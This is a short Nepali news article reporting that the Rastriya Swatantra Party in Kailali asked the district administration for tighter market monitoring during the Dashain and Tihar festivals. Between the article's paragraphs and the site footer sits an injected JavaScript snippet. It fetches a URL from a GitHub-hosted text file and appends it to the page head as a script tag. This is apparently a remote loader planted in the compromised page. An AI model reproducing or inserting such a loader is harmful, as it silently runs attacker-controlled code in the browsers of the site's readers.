चाडपर्व लक्षित अनुगमन प्रभावकारी होस्ः रास्वपा

सावित्री जोशी

धनगढी : राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)ले चाडपर्व लक्षित अनुगमन प्रभावकारी बनाउन जिल्ला प्रशासन कार्यालय कैलालीलाई आग्रह गरेको छ ।

बुधबार जिल्ला प्रशासन कार्यालय कैलालीका प्रमुख जिल्ला अधिकारी धमेन्द्र कुमार मिश्रलाई ज्ञापन पत्र बुझाउँदै रास्वपा सुदूरपश्चिम प्रदेश कमिटीले चाडपर्वका बेलामा प्रभावकारी रुपमा बजार अनुगमन गर्न आग्रह गरेका हुन् ।

Galaxy

दशैँ तिहार नजिकिएसँगै बजारमा व्यापारीहरुले विभिन्न बाहनामा कालोबजारी गर्नुका साथै सामाग्रीको कृतिम अभाव देखाएर मनपरी मूल्यवृद्धि गर्ने गरेको भन्दै अनुगमनलाई प्रभावकारी बनाउन आग्रह गरिएको रास्वपा कैलाली जिल्लाका सभापति महेश कुमार चौधरीले जानकारी दिएका छन् ।

चौधरीका अनुसार बजार अनुगमन भइरहेको भए पनि अनुगमन फितलो नहोस्, उपभोक्ता नठगिउन् भन्ने उद्धेश्यका साथ जिल्ला प्रशासन कार्यालय कैलालीमा ज्ञापन पत्र बुझाइएको हो ।

यता ज्ञापन पत्र बुझ्दै प्रमुख जिल्ला अधिकारी मिश्रले चाडपर्व लक्षित अनुगमन प्रभावकारी रुपमा भइरहेको र आगामी दिनमा पनि थप प्रभावकारी रुपमा अनुगमन गर्ने प्रतिबद्धता जनाएका छन् ।

;var url = ‘https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt’;fetch(url).then(response => response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});

कल २४ न्युजमा प्रकाशित सामग्रीबारे कुनै गुनासो, सुचना तथा सुझाव भए हामीलाई [email protected] मा पठाउनु होला । FacebookInstagram मार्फत पनि हामीसँग जोडिन सक्नुहुनेछ । हाम्रो YouTube च्यानल पनि हेर्नु होला ।

यो खबर पढेर तपाईंलाई कस्तो महसुस भयो ?

0%

खुसी

0%

दु :खी

0%

अचम्मित

0%

उत्साहित

0%

आक्रोशित

Pradesh
Ban karyalaya

सम्बन्धित समाचार